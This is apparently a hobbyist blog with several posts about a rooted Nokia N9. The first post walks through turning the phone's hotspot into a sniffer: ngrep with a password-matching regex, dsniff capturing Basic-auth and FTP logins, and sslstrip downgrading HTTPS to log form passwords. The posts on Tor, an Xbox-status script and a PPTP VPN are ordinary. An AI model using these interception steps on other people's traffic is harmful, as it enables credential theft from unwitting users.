true-binary.com

Prelude: I used it in all these tools for development and privat use, e.g. you shouldn’t use it in a coffee-shop, call your hotspot “Free-Wifi” and turn the encryption off

The last month I looked for a way to use my n9 as package sniffer and I figured out some usefull stuff …

… my train of thought was – how can I sniff whatever it’s transmitted through my stock wifi-hotspot (joikuspot) …

… so here’s a guideline of what I got working and how it works:

My device:

Nokia n9, Linux RM 696 2.6.32.54-dfl-161-20121301 open mode, meego Harmattan PR1.3

Pre-dependencies:

• opensh_1.00_armel
• enable rzr’s repository (setup repository)

I AM WORKING IN OPEN MODE, SO I DONT KNOW IF IT WORKS WITH THE STOCK KERNEL!!!

1. tcpdump + tcpxtract
2. ngrep
3. dsniff [dsniff itself]
4. ssldump?

1. tcpdump + tcpxtract:

tcpdump is a very powerful package analyzer – you can dump nearly all traffic with this tool …

tcpxtract is a tool to rebuild data from tcpdump-pcap files…

let’s install the packages [and dependencies]:

apt-get install tcpdump libpcap0.8

I took the tcpxtract_1.0.1-5_armel package out of the debian repository.

dpkg -i tcpxtract_1.0.1-5_armel.deb

now fire up the wifi hotspot, connect with a client and let the magic begin:

mkdir tcpxtract_out/
tcpdump -i wlan0 -n -s 1500 -w tcpdump_http.pcap port 80

# we are starting tcpdump on interface [-i] wlan0, set the snaplen to 1500 [-s], don’t convert addresses to names [-n] and listen only on port 80 [port 80]

open a website on the client … tcpdump will capture it.

when you think you are finished, kill tcpdump [crtl+c]

now we will convert the captured traffic:

/home/user/dev/tcpplay # tcpxtract -f tcpdump_http.pcap -o tcpxtract_out/

Found file of type “html” in session [82.150.199.80:20480 -> 192.168.20.20:25055], exporting to tcpxtract_out/00000000.html

Found file of type “png” in session [82.150.199.80:20480 -> 192.168.20.20:25055], exporting to tcpxtract_out/00000001.png

Found file of type “png” in session [82.150.199.80:20480 -> 192.168.20.20:25055], exporting to tcpxtract_out/00000002.png

Found file of type “png” in session [192.168.20.20:26079 -> 82.150.199.80:20480], exporting to tcpxtract_out/00000003.png

…

…

Found file of type “png” in session [92.122.212.57:20480 -> 192.168.20.20:30431], exporting to tcpxtract_out/00000021.png

it looks like this.

I LIKE!

2. ngrep

ngrep is a very powerful tool as well – you can analyze traffic live…

I’m going to show you how to filter the traffic by some regular expressions to look for logins:

first install the necessary dependencies and ngrep itself:

apt-get install lipcap0.8

here’s ngrep_1.45.ds2-9_armel [from debian repository]

dpkg -i ngrep ngrep_1.45.ds2-9_armel.deb

now fire up the wifi hotspot, connect with a client and let the magic begin [again ]:

/home/user/dev/sniffer # ngrep ‘[&\s?](?:login|user(?:name|)|p(ass(?:word|wd|)|w|wd))[\s:=]\s?([^&\s]*)’ -q -i -d gprs0 port 80 or port 25 or port 110 -l
interface: gprs0 (123.123.123.123/255.255.255.255)
filter: (ip or ip6) and ( port 80 or port 25 or port 110 )
match: [&\s?](?:login|user(?:name|)|p(ass(?:word|wd|)|w|wd))[\s:=]\s?([^&\s]*)

T 123.123.123.123:61342 -> 82.150.199.80:80 [AP]
log=ohyes&pwd=itworks&wp-submit=Log+In&redirect_to=http%3A%2F%2Fwww.true-binary.com%2Fwp-admin%2F&testcookie=1

# we are starting ngrep with a regular expression filter, tell it to be quiet [-q], to ignore case [-i], to use interface gprs0 [-d] (i had segment faults when I started it on wlan0 … from time to time), -l to make the stdout line buffered [-l] (usefull when capturing to a file {2>&1 >ngrep.log}) and filter the traffic by ports [port 80 or port 25 or port 110]

… What it doesn’t do is capturing htaccess logins, I use dsniff for it.

3. dsniff

dsniff? – omg, it’s awesome! it includes:

arpspoof  – Send out unrequested (and possibly forged) arp replies.
dnsspoof  – forge replies to arbitrary DNS address / pointer queries on the Local Area Network.
dsniff    – password sniffer for several protocols.
filesnarf – saves selected files sniffed from NFS traffic.
macof     – flood the local network with random MAC addresses.
mailsnarf – sniffs mail on the LAN and stores it in mbox format.
msgsnarf  – record selected messages from different Instant Messengers.
sshmitm   – SSH monkey-in-the-middle. proxies and sniffs SSH traffic.
sshow     – SSH traffic analyser.
tcpkill   – kills specified in-progress TCP connections.
tcpnice   – slow down specified TCP connections via “active” traffic shaping.
urlsnarf  – output selected URLs sniffed from HTTP traffic in CLF.
webmitm   – HTTP / HTTPS monkey-in-the-middle. transparently proxies.
webspy    – sends URLs sniffed from a client to your local browser (requires libx11-6 installed).

dsniff does have some more dependencies than the other tools I described:

I took the libdb4.6_4.6.21-16_armel and libnids1.21_1.23-2_armel from the debian repository.

Here’s dsniff_2.4b1+debian-18_armel

apt-get install libnet1 libpcap0.8 libssl0.9.8 openssl

dpkg -i libdb4.6_4.6.21-16_armel.deb

dpkg -i libnids1.21_1.23-2_armel.deb

dpkg -i dsniff_2.4b1+debian-18_armel.deb

whooop! – should be working now

dsniff itself is very simple to use – it has a build-in filter. I used it to sniff the authentication for htaccess logins as well as ftp logins:

/home/user/dev/sniffer # dsniff -m -s 1500 -i gprs0
dsniff: listening on gprs0

—————–
01/31/13 10:45:02 tcp 123.123.123.123.61056 -> p111.111.111.111.some.isp.com.80 (http)
GET / HTTP/1.0
host: server.idonttellyou.com
authorization: Basic dGhpc2lzOmh0YWNjZXNzZHVtcA== [thisis:htaccessdump]

—————–
01/31/13 10:47:22 tcp 123.123.123.123.57838 -> 82.150.199.80.21 (ftp)
USER thisis
PASS ftpdump

# we are starting dsniff with automatic protocol detection [-m], set the snaplen to 1500 [-s] and listen on interface gprs0 [-i] … again I got segment faults when listening on wlan0.

4. sslstrip?

sslstrip strips down your https connections to http …

… I found a way to pipe your local connection through sslstrip, but not with the hotspot connected client.

All I did was to modify my APN connection – I activated the http_proxy on 127.0.0.1 and port 10000, and changed a gconf setting (gconftool-2 -t string -s /system/proxy/mode “manual”) – deactivate and activate the connection again and fire up sslstrip.

An alternative for testing is to set the http proxy in firefox.

What I figured out was: The Joikuspot doesn’t use the APN entry from the phone settings, because I tried to add a second APN with some changed settings and it won’t show up in the properties of Joikuspot. – Maybe that’s why it doesn’t take the proxy settings from the APN … anyway, I’m still working on a workaround!

Here’s sslstrip-0.9 (taken from http://www.thoughtcrime.org/)

/home/user/dev/sniffer/# apt-get install python-twisted-web

/home/user/dev/sniffer # tar xzf sslstrip-0.9.tar.gz && cd sslstrip-0.9

/home/user/dev/sniffer/sslstrip-0.9 # python setup.py build
running build
running build_py
running build_scripts
copying and adjusting sslstrip/sslstrip -> build/scripts-2.6
Cleaning up…
/home/user/dev/sniffer/sslstrip-0.9 # python setup.py install
running install
running build
running build_py
running build_scripts
copying and adjusting sslstrip/sslstrip -> build/scripts-2.6
running install_lib
running install_scripts
copying build/scripts-2.6/sslstrip -> /usr/local/bin
changing mode of /usr/local/bin/sslstrip to 755
running install_data
running install_egg_info
Removing /usr/local/lib/python2.6/dist-packages/sslstrip-0.9.egg-info
Writing /usr/local/lib/python2.6/dist-packages/sslstrip-0.9.egg-info
Cleaning up…
/home/user/dev/sniffer/sslstrip-0.9 # ln -s /usr/local/bin/sslstrip /usr/bin/

/home/user/dev/sniffer/sslstrip-0.9 # gconftool-2 -t string -s /system/proxy/mode “manual”

/home/user/dev/sniffer/sslstrip-0.9 # sslstrip -l 10000 -w ../sslstrip.log &

/home/user/dev/sniffer/sslstrip-0.9 # tail -f ../sslstrip.log

2013-01-31 23:57:56,683 SECURE POST Data (www.facebook.com):
lsd=AVpjTuuG&email=thisis%40just.an&pass=example&default_persistent=0&charset_test=%E2%82%AC%2C%C2%B4%2C%E2%82%AC%2C

… I also got the webmitm/mitmproxy running (fakes SSL-certifications, but as it’s not a very efficient and elegant way to work, so I won’t explain it)

cheers!

here’s a quick and dirty howto run the tor-service on your meego/harmattan device for anonymous internet traffic:

pre-dependencies:

• inception
• opensh_1.00_armel (incept the package … you need it to gain more rights)

after the inception of opensh, you can try to check if it worked:

~ $ id
uid=29999(user) gid=29999(users) groups=0(root),20(dialout),44(video),670(pulse-access),29999(users),30011(metadata-users),30016(gallerycoredata-users),30019(calendar),9990210,9990276,9990277,9990279,9990281, 9990282,9990284,9990285,9990286,9990287,9990288,9990289,9990609
~ $ opensh

/home/user # id
uid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4(adm),5(tty),6(disk),7(lp),8(mail), 9(news),10(uucp),12(man),13(proxy),15(kmem),20(dialout),21(fax),22(voice), 24(cdrom),25(floppy),26(tape),27(sudo),29(audio),30(dip),33(www-data),34(backup),37(operator),38(list),39(irc),40(src),41(gnats),42(shadow), 43(utmp),44(video),45(sasl),46(plugdev),50(staff),60(games),100(libuuid), 101(debian-tor),669(pulse),670(pulseaccess),671(pulsert),29996(cal), 29999(users),30002(input),30003(i2c),30004(adc),30005(upstart),30010(crypto), 30011(metadatausers),30012(phonet),30013(signon),30014(csd), 30015(messagebus),30016(gallerycoredatausers),30017(acm), 30018(osa),30019(calendar),30020(libaccountsnoa),30021(lpm), 30022(visualreminder),30023(nfc),30024(location),30025(slpgwd), 30026(haldaemon),30027(powerdev),30028(developer),30029(ssh),65100(spool), 65534(nogroup),9990001,9990004,9990245,9990256,9990257,9990258,9990259, 9990260,9990261,9990262,9990263,9990264,9990265,9990266,9990270,9990276, 9990277,9990279,9990281,9990282,9990284,9990285, 9990286,9990287,9990288,9990289,9990294,9990297,9990298,9990300, 9990301,9990302,9990306,9990307,9990308,9990309,9990313,9990314, 9990315,9990316,9990317,9990320,9990326,9990327, 9990330,9990331,9990332,9990334,9990337,9990346,9990352,9990353, 9990355,9990356,9990361,9990367,9990368,9990374,9990376,9990377, 9990381,9990382,9990384,9990385,9990387,9990388, 9990390,9990391,9990393,9990394,9990396,9990397,9990401,9990402, 9990403,9990404,9990405,9990406,9990407,9990408,9990409,9990410, 9990413,9990414,9990415,9990416,9990417,9990418, 9990419,9990420,9990421,9990422,9990423,9990424,9990427,9990430, 9990433,9990438,9990439,9990440,9990442,9990448,9990453,9990454, 9990466,9990478,9990482,9990483,9990491,9990492, 9990493,9990494,9990497,9990500,9990501,9990508,9990511,9990512, 9990521,9990526,9990534,9990536,9990547,9990574,9990575,9990577, 9990578,9990588,9990590,9990594,9990649

whooop … looks good!

now we come to some tricky stuff:

1. enable rzr’s repository (setup repository)
2. install tor through command line: apt-get install tor

… apt will now go crazy with alot of permission errors:

• chown: /var/lib/tor: Operation not permitted

to fix this – change the ownership for all the errors manually (through opensh):

• chown debian-tor:debian-tor /var/lib/tor
• chown debian-tor:debian-tor /var/run/tor
• …

… now we have to check if we use our phone as dns-server …

the file “/etc/resolv.conf” should contain the following string:

nameserver 127.0.0.1

… the next step is to configure the torrc file “/etc/tor/torrc”

mine looks like this:

SocksPort 9050 # what port to open for local application connections
SocksListenAddress 127.0.0.1 # accept connections only from localhost
VirtualAddrNetwork 10.192.0.0/10
AutomapHostsOnResolve 1
TransPort 9040
DNSPort 53
RunAsDaemon 1

… tor should be staring up as a daemon now!

to make things easier, I packed some scripts together to handle tor through 3 desktop icons:

1. to start tor for all traffic
2. to start tor in background (for example: in fennec/firefox set socks proxy to localhost:9050)
3. to stop tor and unset system-wide proxy settings

here you can download torswitch0.1

cheers!

the location of the folders is:

/home/user/.local/share/applications

… folders are saved under folder*.directory … (* sequential number)

/home/user/.local/share/applications # cat folder13.directory
[Desktop Entry]
Type=Directory
Name=tor
X-MeeGo-Folder-Index=13
Icon=icon-l-default-application

ghost folders can be removed through command line,

cheers

I was searching for an easy way to check if my xbox-live friends are online and what they are up to…

… since microsoft xbox live doesn’t have no official api, I found a website which offers json-data in return of requesting an url with the given xbox-live username!

… I packed it all together to a python-script with a CLI, where you can add, delete and check the online status of your friends.

NOTICE: The OnlineStatus is not always shown – it depends on your xbox-privacy settings!!!

download the tool: meexbox_cli.deb (armel)

download the source: meexbox_cli_source.tar.gz

cheers

I’ve never done something simple like this before.

First install the package:

apt-get install pptpd

then edit the localip and remoteip in your /etc/pptpd.conf file.

and next add a user with password:

echo “USERNAME pptpd PASSWORD *” >> /etc/ppp/chap-secrets

and restart the pptpd server:

/etc/init.d/pptpd restart

done.

It tested it with the android (kernel: 2.6.29-TheOfficial-00479-g3c7df37) vpn client

logcat:

I/ActivityManager(  695): Start proc com.android.server.vpn:remote for service com.android.server.vpn/.VpnServiceBinder: pid=13445 uid=1000 gids={3002, 3001, 3003}
D/VpnManager(13178): succeeded to connect to VPN service
D/com.android.settings.vpn.AuthenticationActor(13178): ~~~~~~ connect() succeeded!
D/VpnSettings(13178): received connectivity: true-binary.com: connected? CONNECTING   err=0
I/SProxy_mtpd(13445): Stop VPN daemon: mtpd
D/SProxy_mtpd(13445): mtpd is stopped after 0 msec
D/SProxy_mtpd(13445): stopping mtpd, success? true
D/VpnService(13445):   Local IP: 188.45.67.169, if: rmnet0
D/VpnService(13445):        VPN UP: down
I/SProxy_mtpd(13445): Start VPN daemon: mtpd
D/mtpd    (13453): Waiting for control socket
D/SProxy_mtpd(13445): mtpd is running after 200 msec
D/mtpd    (13453): Received 20 arguments
I/mtpd    (13453): Using protocol pptp
I/mtpd    (13453): Connecting to 86.33.100.93 port 1723
I/SProxy_mtpd(13445): got data from control socket: 20
I/mtpd    (13453): Connection established (socket = 9)
D/mtpd    (13453): Sending SCCRQ
D/mtpd    (13453): Received SCCRP -> Sending OCRQ (local = 3740)
I/mtpd    (13453): Tunnel established
D/mtpd    (13453): Received OCRQ (remote = 32769)
I/mtpd    (13453): Session established
I/mtpd    (13453): Creating PPPoX socket
I/mtpd    (13453): Starting pppd (pppox = 11)
I/pppd    (13454): Using PPPoX (socket = 11)
I/mtpd    (13453): Pppd started (pid = 13454)
D/pppd    (13454): using channel 4
I/pppd    (13454): Using interface ppp0
I/pppd    (13454): Connect: ppp0 <–>
I/pppd    (13454): MPPE 128-bit stateless compression enabled
I/pppd    (13454): local  IP address 192.168.1.1
I/pppd    (13454): remote IP address 192.168.0.1
I/ip-up-vpn(13455): All traffic is now redirected to 192.168.0.1
D/VpnService(13445): onConnected()
I/VpnService(13445): save original dns prop: 194.48.139.254, 194.48.124.200
I/VpnService(13445): save original suffices:
D/VpnSettings(13178): received connectivity: true-binary.com: connected? CONNECTED   err=0
D/VpnServiceBinder(13445):      saving states
I/VpnService(13445): set vpn dns prop: ,
I/VpnService(13445): VPN connectivity monitor running
I/ActivityManager(  695): Process com.facebook.katana (pid 12508) has died.

and the syslog of debian (interpid kernel: 2.6.27-11) gives:

Jan  5 17:50:16 server pptpd[8979]: CTRL: Client 188.45.67.169 control connection started
Jan  5 17:50:16 server pptpd[8979]: CTRL: Starting call (launching pppd, opening GRE)
Jan  5 17:50:16 server pppd[8980]: Plugin /usr/lib/pptpd/pptpd-logwtmp.so loaded.
Jan  5 17:50:16 server pppd[8980]: pppd 2.4.4 started by root, uid 0
Jan  5 17:50:16 server pppd[8980]: Using interface ppp0
Jan  5 17:50:16 server pppd[8980]: Connect: ppp0 <–> /dev/pts/1
Jan  5 17:50:16 server pptpd[8979]: GRE: Bad checksum from pppd.
Jan  5 17:50:17 server pppd[8980]: MPPE 128-bit stateless compression enabled
Jan  5 17:50:17 server pppd[8980]: found interface eth0 for proxy arp
Jan  5 17:50:17 server pppd[8980]: local  IP address 192.168.0.1
Jan  5 17:50:17 server pppd[8980]: remote IP address 192.168.1.1

fine

PS: It’s funny that my kernel on the android phone is newer than the kernel on the debian server